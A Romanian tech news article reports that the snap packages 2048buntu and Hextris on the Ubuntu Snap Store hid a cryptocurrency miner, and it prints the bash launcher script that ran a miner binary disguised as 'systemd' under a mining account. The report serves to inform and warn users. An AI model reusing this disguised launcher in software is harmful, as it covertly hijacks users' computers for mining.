Meniu

Malware gasit in magazinul Ubuntu Snap

Cel putin doua dintre pachetele snap, 2048buntu si Hextris, incarcate in Ubuntu Snaps Store de catre utilizatorul Nicolas Tomb, contin programe malware. Toate pachetele de la Nicolas au fost eliminate din Magazinul Ubuntu Snaps, " in asteptarea unor investigatii suplimentare ".

Raportul provine dintr-un bug care mentioneaza ca pachetul snapshot 2048buntu (si alte pachete de Nicolas Tomb) contine un miner de ascundere criptocurrency ascuns. Puteti vedea scriptul initial de mai jos:

#!/bin/bash

 

currency=bcn name=2048buntu

{ # try /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g } || { # catch cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 else /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2 fi }

Nicolas Tomb a folosit o licenta proprietara de exemplu, snap-ul 2048buntu a fost trimis drept proprietate (jocul in sine nu a fost dezvoltat de Nicolas). Jocul in cauza, 2048 , utilizeaza o licenta MIT care permite distribuirea acesteia ca fiind protejata, fara a face disponibil codul sursa, atata timp cat sunt pastrate anunturile privind drepturile de autor.

 

Nota: 2048buntu a fost eliminat din magazinul Ubuntu Snap,.

Ubuntu Snap Store permite oricui sa incarce pachete snap, spre deosebire de pachetele (deb) disponibile doar in depozitele oficiale Ubuntu.

FlorinM

Utilizator Linux - Solus OS, pasionat de calatorii.
  • | 2708 articole

Nici un comentariu inca. Fii primul!
  • powered by Verysign